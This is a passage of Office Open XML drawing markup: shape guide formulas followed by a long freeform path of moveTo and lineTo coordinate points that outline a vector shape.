                  <a:gd name="T37" fmla="*/ 546 h 733"/>
                  <a:gd name="T38" fmla="*/ 32 w 135"/>
                  <a:gd name="T39" fmla="*/ 537 h 733"/>
                  <a:gd name="T40" fmla="*/ 34 w 135"/>
                  <a:gd name="T41" fmla="*/ 522 h 733"/>
                  <a:gd name="T42" fmla="*/ 47 w 135"/>
                  <a:gd name="T43" fmla="*/ 506 h 733"/>
                  <a:gd name="T44" fmla="*/ 40 w 135"/>
                  <a:gd name="T45" fmla="*/ 488 h 733"/>
                  <a:gd name="T46" fmla="*/ 45 w 135"/>
                  <a:gd name="T47" fmla="*/ 459 h 733"/>
                  <a:gd name="T48" fmla="*/ 46 w 135"/>
                  <a:gd name="T49" fmla="*/ 446 h 733"/>
                  <a:gd name="T50" fmla="*/ 33 w 135"/>
                  <a:gd name="T51" fmla="*/ 446 h 733"/>
                  <a:gd name="T52" fmla="*/ 27 w 135"/>
                  <a:gd name="T53" fmla="*/ 418 h 733"/>
                  <a:gd name="T54" fmla="*/ 33 w 135"/>
                  <a:gd name="T55" fmla="*/ 375 h 733"/>
                  <a:gd name="T56" fmla="*/ 34 w 135"/>
                  <a:gd name="T57" fmla="*/ 354 h 733"/>
                  <a:gd name="T58" fmla="*/ 44 w 135"/>
                  <a:gd name="T59" fmla="*/ 327 h 733"/>
                  <a:gd name="T60" fmla="*/ 59 w 135"/>
                  <a:gd name="T61" fmla="*/ 288 h 733"/>
                  <a:gd name="T62" fmla="*/ 64 w 135"/>
                  <a:gd name="T63" fmla="*/ 269 h 733"/>
                  <a:gd name="T64" fmla="*/ 61 w 135"/>
                  <a:gd name="T65" fmla="*/ 231 h 733"/>
                  <a:gd name="T66" fmla="*/ 65 w 135"/>
                  <a:gd name="T67" fmla="*/ 202 h 733"/>
                  <a:gd name="T68" fmla="*/ 74 w 135"/>
                  <a:gd name="T69" fmla="*/ 166 h 733"/>
                  <a:gd name="T70" fmla="*/ 81 w 135"/>
                  <a:gd name="T71" fmla="*/ 130 h 733"/>
                  <a:gd name="T72" fmla="*/ 81 w 135"/>
                  <a:gd name="T73" fmla="*/ 100 h 733"/>
                  <a:gd name="T74" fmla="*/ 84 w 135"/>
                  <a:gd name="T75" fmla="*/ 87 h 733"/>
                  <a:gd name="T76" fmla="*/ 84 w 135"/>
                  <a:gd name="T77" fmla="*/ 24 h 733"/>
                  <a:gd name="T78" fmla="*/ 92 w 135"/>
                  <a:gd name="T79" fmla="*/ 1 h 733"/>
                  <a:gd name="T80" fmla="*/ 107 w 135"/>
                  <a:gd name="T81" fmla="*/ 25 h 733"/>
                  <a:gd name="T82" fmla="*/ 116 w 135"/>
                  <a:gd name="T83" fmla="*/ 61 h 733"/>
                  <a:gd name="T84" fmla="*/ 133 w 135"/>
                  <a:gd name="T85" fmla="*/ 91 h 733"/>
                  <a:gd name="T86" fmla="*/ 119 w 135"/>
                  <a:gd name="T87" fmla="*/ 116 h 733"/>
                  <a:gd name="T88" fmla="*/ 111 w 135"/>
                  <a:gd name="T89" fmla="*/ 141 h 733"/>
                  <a:gd name="T90" fmla="*/ 115 w 135"/>
                  <a:gd name="T91" fmla="*/ 160 h 733"/>
                  <a:gd name="T92" fmla="*/ 100 w 135"/>
                  <a:gd name="T93" fmla="*/ 179 h 733"/>
                  <a:gd name="T94" fmla="*/ 89 w 135"/>
                  <a:gd name="T95" fmla="*/ 223 h 733"/>
                  <a:gd name="T96" fmla="*/ 84 w 135"/>
                  <a:gd name="T97" fmla="*/ 261 h 733"/>
                  <a:gd name="T98" fmla="*/ 80 w 135"/>
                  <a:gd name="T99" fmla="*/ 319 h 733"/>
                  <a:gd name="T100" fmla="*/ 69 w 135"/>
                  <a:gd name="T101" fmla="*/ 364 h 733"/>
                  <a:gd name="T102" fmla="*/ 65 w 135"/>
                  <a:gd name="T103" fmla="*/ 393 h 733"/>
                  <a:gd name="T104" fmla="*/ 61 w 135"/>
                  <a:gd name="T105" fmla="*/ 454 h 733"/>
                  <a:gd name="T106" fmla="*/ 60 w 135"/>
                  <a:gd name="T107" fmla="*/ 476 h 733"/>
                  <a:gd name="T108" fmla="*/ 71 w 135"/>
                  <a:gd name="T109" fmla="*/ 506 h 733"/>
                  <a:gd name="T110" fmla="*/ 57 w 135"/>
                  <a:gd name="T111" fmla="*/ 515 h 733"/>
                  <a:gd name="T112" fmla="*/ 61 w 135"/>
                  <a:gd name="T113" fmla="*/ 554 h 733"/>
                  <a:gd name="T114" fmla="*/ 48 w 135"/>
                  <a:gd name="T115" fmla="*/ 583 h 733"/>
                  <a:gd name="T116" fmla="*/ 32 w 135"/>
                  <a:gd name="T117" fmla="*/ 622 h 733"/>
                  <a:gd name="T118" fmla="*/ 50 w 135"/>
                  <a:gd name="T119" fmla="*/ 650 h 733"/>
                  <a:gd name="T120" fmla="*/ 94 w 135"/>
                  <a:gd name="T121" fmla="*/ 687 h 733"/>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35"/>
                  <a:gd name="T184" fmla="*/ 0 h 733"/>
                  <a:gd name="T185" fmla="*/ 135 w 135"/>
                  <a:gd name="T186" fmla="*/ 733 h 733"/>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35" h="733">
                    <a:moveTo>
                      <a:pt x="112" y="694"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="110" y="695"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="694"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="691"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="691"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="693"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="697"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="700"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="701"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="702"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="704"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="712"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="716"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="722"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="729"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="731"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="732"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="733"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="728"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="720"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="715"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="710"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="708"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="706"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="705"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="711"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="711"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="713"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="709"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="707"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="704"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="704"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="701"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="700"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="698"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="698"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="698"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="693"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="690"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="688"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="687"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="682"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="686"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="684"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="678"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="676"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="676"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="678"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="674"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="672"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="669"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="667"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="664"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="663"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="663"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="659"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="658"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="656"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="654"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="651"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="646"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="644"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="644"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="646"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="645"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="637"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="633"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="629"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="624"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="619"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="615"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="619"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="603"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="596"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="587"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="585"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="585"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="588"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="589"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="586"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="584"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="579"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="581"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="579"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="580"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="577"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="574"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="571"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="570"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="568"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="568"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="564"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="562"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="558"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="557"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="557"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="556"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="551"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="553"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="552"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="550"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="545"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="544"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="539"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="535"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="535"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="537"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="540"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="543"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="545"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="551"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="551"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="550"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="546"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="545"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="546"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="550"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="555"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="544"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="537"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="531"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="527"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="526"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="524"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="524"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="522"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="521"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="518"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="517"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="515"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="510"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="506"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="503"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="502"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="498"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="494"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="492"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="488"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="479"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="476"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="473"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="468"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="460"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="459"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="457"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="454"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="451"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="451"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="449"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="446"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="443"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="442"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="446"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="446"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="446"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="444"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="440"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="433"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="418"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="414"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="407"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="400"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="397"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="381"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="375"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="370"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="366"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="358"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="355"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="354"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="354"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="354"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="352"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="351"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="340"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="335"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="327"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="321"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="314"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="308"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="303"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="288"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="287"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="281"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="274"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="269"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="266"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="264"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="262"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="255"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="238"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="226"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="212"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="206"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="202"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="191"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="183"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="166"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="159"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="145"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="160"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="165"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="165"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="166"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="172"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="188"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="203"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="223"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="228"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="238"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="246"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="251"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="261"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="285"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="291"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="295"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="311"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="316"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="319"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="329"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="332"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="341"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="344"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="354"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="364"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="374"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="383"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="384"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="389"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="390"/>
